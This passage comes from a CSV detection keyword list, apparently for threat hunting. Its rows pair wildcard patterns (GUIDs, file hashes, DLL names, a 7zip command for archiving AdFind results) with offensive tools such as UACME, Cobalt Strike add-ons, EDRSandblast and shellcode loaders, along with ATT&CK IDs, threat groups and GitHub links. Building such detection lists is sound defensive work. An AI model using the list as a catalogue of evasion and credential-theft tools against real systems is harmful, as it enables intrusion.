T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RiccardoAncarani/LiquidSnake","1","1","N/A","10","10","306","47","2021-09-01T11:53:30Z","2021-08-31T12:23:01Z"
+"*6F99CB40-8FEF-4B63-A35D-9CEEC71F7B5F*","offensive_tool_keyword","PrivFu","Kernel mode WinDbg extension and PoCs for token privilege investigation.","T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001","TA0007 - TA0008 - TA0002 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","0","N/A","10","6","575","94","2023-10-02T03:31:07Z","2021-12-28T13:14:25Z"
+"*7.exe a -mx3 ad.7z ad_*.txt*","offensive_tool_keyword","7zip","7zip command to zip results from adfind scans. 
attackers perform Active Directory collection using AdFind in batch scriptsfrom C:\Windows\Temp\adf\ or C:\temp\ and store output in CSV files","T1074.001 - T1083 - T1560.001 - T1105","TA0003 - TA0007 - TA0009","N/A","N/A","Exploitation tools","http://www.joeware.net/freetools/tools/adfind/index.htm","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*70527328-DCEC-4BA7-9958-B5BC3E48CE99*","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","0","N/A","9","3","297","76","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z"
+"*713724C3-2367-49FA-B03F-AB4B336FB405*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object File (BOF) Conversion of the Mockingjay Process Injection Technique","T1055.012 - T1059.001 - T1027.002","TA0002 - TA0005","N/A","N/A","C2","https://github.com/ewby/Mockingjay_BOF","1","0","N/A","9","10","32","7","2023-08-27T14:09:39Z","2023-08-27T06:01:28Z"
+"*7180e3ad80a06a52e84d9b530b7a27016f7dd20842d832726c96366e399ee85a*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z"
+"*73948912-CEBD-48ED-85E2-85FCD1D4F560*","offensive_tool_keyword","DueDLLigence","Shellcode runner framework for application whitelisting bypasses and DLL side-loading","T1055.012 - T1218.011","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/mandiant/DueDLLigence","1","0","N/A","10","5","442","90","2023-06-02T14:24:43Z","2019-10-04T18:34:27Z" 
+"*73d30bd3b8d21a552b8b0c00a7412120db13b3ce0ce8884ed270842863b01a36*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z"
+"*73e735426c5fab97a7289a7a57bc8bb21bce7b2b1995ae076c41027780ed88c9*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z"
+"*7443/new/payloads*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z"
+"*750326700ffeeac7f34aa111af345fec1c221f519347e57e35b96454fcc044f6*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z"
+"*7565529119639cd275dc65b5290ad98bf4f4178f98d0b55368d337227c9ef085*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation 
tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z"
+"*76faa46729e53c1204c1c6f4d51d9a0c2701cca1f7e927249cfb0bce71e60022*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z"
+"*76FFA92B-429B-4865-970D-4E7678AC34EA*","offensive_tool_keyword","SharpDomainSpray","Basic password spraying tool for internal tests and red teaming","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/HunnicCyber/SharpDomainSpray","1","0","N/A","10","1","91","18","2020-03-21T09:17:48Z","2019-06-05T10:47:05Z"
+"*77b78b6e16972c318fcbba39976858787cc31038f82952d2a94f844f5847a61e*","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","8","4","347","56","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z"
+"*785ca1f83eab4185774f140b74d30823a69dec01ca06ccba4bfd8d1ddd3255d9*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z"
+"*789CF3CBCC0DC849CC2B51703652084E2D2A4B2D02003B5C0650*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - 
TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z"
+"*79F54747-048D-4FD6-AEF4-7B098F923FD8*","offensive_tool_keyword","ContainYourself","Abuses the Windows containers framework to bypass EDRs.","T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015","TA0005","N/A","N/A","Defense Evasion","https://github.com/deepinstinct/ContainYourself","1","0","N/A","10","3","257","31","2023-08-31T07:26:22Z","2023-07-12T14:47:24Z"
+"*7be72ada31cc042e7dea712308f59235516a6ae1d434b24645cd4726a12b5d64*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z"
+"*7CFC52.dll*","offensive_tool_keyword","cobaltstrike","Convert Cobalt Strike profiles to modrewrite scripts","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/threatexpress/cs2modrewrite","1","1","N/A","10","10","553","114","2023-01-30T17:47:51Z","2017-06-06T14:53:57Z"
+"*7CFC52CD3F.dll*","offensive_tool_keyword","cobaltstrike","Convert Cobalt Strike profiles to modrewrite scripts","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/cs2modrewrite","1","1","N/A","10","10","553","114","2023-01-30T17:47:51Z","2017-06-06T14:53:57Z"
+"*7E3E2ECE-D1EB-43C6-8C83-B52B7571954B*","offensive_tool_keyword","EDRSandBlast","EDRSandBlast is a tool written in C that weaponize a vulnerable signed driver to bypass EDR detections","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/wavestone-cdt/EDRSandblast","1","0","N/A","10","10","1117","224","2023-09-22T14:18:21Z","2021-11-02T15:02:42Z"
+"*7E3E2ECE-D1EB-43C6-8C83-B52B7571954B*","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - 
T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","0","N/A","10","2","183","35","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z"
+"*7E47D586-DDC6-4382-848C-5CF0798084E1*","offensive_tool_keyword","ShadowSpray","A tool to spray Shadow Credentials across an entire domain in hopes of abusing long forgotten GenericWrite/GenericAll DACLs over other objects in the domain.","T1110.003 - T1098 - T1059 - T1075","TA0001 - TA0008 - TA0009","N/A","N/A","Discovery","https://github.com/ShorSec/ShadowSpray","1","0","N/A","7","5","408","72","2022-10-14T13:36:51Z","2022-10-10T08:34:07Z"
+"*7e8e77d67c76bdf7bf34f0aef7cb3f18f51efb0b2ab20ffe600240824331986e*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z"
+"*7E9729AA-4CF2-4D0A-8183-7FB7CE7A5B1A*","offensive_tool_keyword","Crassus","Crassus Windows privilege escalation discovery tool","T1068 - T1003 - T1003.003 - T1046","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/vu-ls/Crassus","1","0","N/A","10","6","503","55","2023-09-29T20:02:02Z","2023-01-12T21:01:52Z"
+"*7H0LmBxFtXBPd0/3vHe7Z3dmdrPZmTzp3ZldQrJ5LOGxeZ*","offensive_tool_keyword","HoneypotBuster","Microsoft PowerShell module designed for red teams that can be used to find honeypots and honeytokens in the network or at the host","T1083 - T1059.001 - T1112","TA0007 - TA0002","N/A","N/A","Lateral Movement","https://github.com/JavelinNetworks/HoneypotBuster","1","0","N/A","8","3","270","60","2017-12-05T13:03:11Z","2017-07-22T15:40:44Z"
+"*7L0LgBxFtTDc093TPe/dntnM7G6Sncm*","offensive_tool_keyword","HoneypotBuster","Microsoft PowerShell module designed for red teams that can be used to find honeypots and honeytokens in the network 
or at the host","T1083 - T1059.001 - T1112","TA0007 - TA0002","N/A","N/A","Lateral Movement","https://github.com/JavelinNetworks/HoneypotBuster","1","0","N/A","8","3","270","60","2017-12-05T13:03:11Z","2017-07-22T15:40:44Z"
+"*7z2john.pl*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z"
+"*802d51a4b440e079020103c46a56967fb6e32f95188600388ef7c8b91dc746e8*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z"
+"*8172069709954a5616b75306e565cbc5cd5baada00c15cba084420e61bebcdaf*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z"
+"*81E60DC6-694E-4F51-88FA-6F481B9A4208*","offensive_tool_keyword","UnhookingPatch","Bypass EDR Hooks by patching NT API stub and resolving SSNs and syscall instructions at runtime","T1055 - T1055.001 - T1070 - T1070.004 - T1211","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/UnhookingPatch","1","0","N/A","9","3","260","43","2023-08-02T02:25:38Z","2023-02-08T16:21:03Z"
+"*82277B35-D159-4B44-8D54-FB66EDD58D5C*","offensive_tool_keyword","FilelessPELoader","Loading Remote AES Encrypted PE in memory - Decrypted it and run it","T1027.001 - T1059.001 - T1071","TA0005 - TA0002","N/A","N/A","Defense 
Evasion","https://github.com/TheD1rkMtr/FilelessPELoader","1","0","N/A","10","8","727","149","2023-08-29T21:46:11Z","2023-02-08T16:59:33Z"
+"*82928d0a1d3263a9676b6587feba86e1716c1a2c20294c6c2210d4557975ff69*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z"
+"*83035080-7788-4EA3-82EE-6C06D2E6891F*","offensive_tool_keyword","HeapCrypt","Encypting the Heap while sleeping by hooking and modifying Sleep with our own sleep that encrypts the heap","T1055.001 - T1027 - T1146","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/HeapCrypt","1","0","N/A","9","3","224","40","2023-08-02T02:24:42Z","2023-03-25T05:19:52Z"
+"*8304a65e6096bcf63f30592b8049d47883c3c755600796c60a36c4c492f7af37*","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","8","4","347","56","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z"
+"*835798995e6df38e12ef18fdcfda6dd1bb8fdffb567a03da46ed1ab7b66a0194*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z"
+"*83772aa217508279294d91af5cfabec9b5e00b836a2e2f5fe37cf1ebc2905a52*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation 
tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z"
+"*847D29FF-8BBC-4068-8BE1-D84B1089B3C0*","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","0","N/A","9","3","297","76","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z"
+"*854A20FB-2D44-457D-992F-EF13785D2B51*","offensive_tool_keyword","DCOMPotato","Service DCOM Object and SeImpersonatePrivilege abuse.","T1548.002 - T1134.002","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/zcgonvh/DCOMPotato","1","0","N/A","10","4","326","46","2022-12-09T01:57:53Z","2022-12-08T14:56:13Z"
+"*866e5289337ab033f89bc57c5274c7ca*","offensive_tool_keyword","RedGuard","RedGuard is a C2 front flow control tool.Can avoid Blue Teams.AVs.EDRs check.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera 
- Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/wikiZ/RedGuard","1","1","N/A","10","10","1098","170","2023-09-19T11:06:40Z","2022-05-08T04:02:33Z"
+"*8776cfacd0e7e409a5f5168261089e6386eeffacedc9158c19d86dfc78e0dc61*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z"
+"*87904247-C363-4F12-A13A-3DA484913F9E*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z"
+"*879A49C7-0493-4235-85F6-EBF962613A76*","offensive_tool_keyword","SnaffPoint","A tool for pointesters to find candies in SharePoint","T1210.001 - T1087.002 - T1059.006","TA0007 - TA0002 - TA0006","N/A","N/A","Discovery","https://github.com/nheiniger/SnaffPoint","1","0","N/A","7","2","191","19","2022-11-04T13:26:24Z","2022-08-25T13:16:06Z"
+"*87a210d7a7ed8cd635437bfe6d79bd9ee9ca8d6ef9079f9b30b4162e3843ad37*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z"
+"*87cc72bb8e3f1534bee09ee278ecd928d975ebb94aeffc767b67249815a0bf3a*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation 
tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*881D4D67-46DD-4F40-A813-C9D3C8BE0965*","offensive_tool_keyword","KRBUACBypass","UAC Bypass By Abusing Kerberos Tickets","T1548.002 - T1558 - T1558.003","TA0004 - TA0006","N/A","N/A","Defense Evasion","https://github.com/wh0amitz/KRBUACBypass","1","0","N/A","8","5","402","52","2023-08-10T02:51:59Z","2023-07-27T12:08:12Z" +"*881D4D67-46DD-4F40-A813-C9D3C8BE0965*","offensive_tool_keyword","S4UTomato","Escalate Service Account To LocalSystem via Kerberos","T1558 - T1558.002 - T1548.002 - T1078 - T1078.004","TA0006 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/S4UTomato","1","0","N/A","10","4","316","58","2023-09-14T08:53:19Z","2023-07-30T11:51:57Z" +"*893b90b942372928009bad64f166c7018701497e4f7cd1753cdc44f76da06707*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*894a784e-e04c-483c-a762-b6c03e744d0b*","offensive_tool_keyword","SharpToken","SharpToken is a tool for exploiting Token leaks. 
It can find leaked Tokens from all processes in the system and use them","T1134 - T1101 - T1214 - T1087 - T1038","TA0004 - TA0007","N/A","N/A","Exploitation tools","https://github.com/BeichenDream/SharpToken","1","1","N/A","N/A","4","353","47","2023-04-11T13:29:23Z","2022-06-30T07:34:57Z" +"*8ac147d1db55cbfaaa3a7cd3c7ae1da147c9add049e8150dab26609a22a53a10*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*8d41849fa260b5a4a6a05db8312b60b3f6f2b5efe4f4d4fdd05c70701c7aabed*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*8f25cacb678c008ff3f205dc9d66f4411902b867df8656ea758c0c6d2141e18f*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*90F6244A-5EEE-4A7A-8C75-FA6A52DF34D3*","offensive_tool_keyword","SharpLDAP","tool written in C# that aims to do enumeration via LDAP queries","T1018 - T1069.003","TA0007 - TA0011","N/A","N/A","Discovery","https://github.com/mertdas/SharpLDAP","1","0","N/A","8","1","50","7","2023-01-14T21:52:36Z","2022-11-16T00:38:43Z" +"*912bbb35787c58046da31f1608d07a68753fa4bd8782e29ef80eb51e65e887d2*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - 
T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*913d774e5cf0bfad4adfa900997f7a1a*","offensive_tool_keyword","cobaltstrike","CobaltStrike4.4 one-click deployment script Randomly generate passwords. keys. port numbers. certificates. etc.. to solve the problem that cs4.x cannot run on Linux and report errors","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/AlphabugX/csOnvps","1","1","N/A","10","10","277","68","2022-03-19T00:10:03Z","2021-12-02T02:10:42Z" +"*913d774e5cf0bfad4adfa900997f7a1a*","offensive_tool_keyword","cobaltstrike","CobaltStrike4.4 one-click deployment script Randomly generate passwords. keys. port numbers. certificates. etc.. 
to solve the problem that cs4.x cannot run on Linux and report errors Gray often ginkgo design","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/AlphabugX/csOnvps","1","1","N/A","10","10","277","68","2022-03-19T00:10:03Z","2021-12-02T02:10:42Z" +"*91EA50CD-E8DF-4EDF-A765-75354643BD0D*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" +"*9209af6bfe87a818df00297bed5517be70c1d931523b71e25813365699df749a*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" 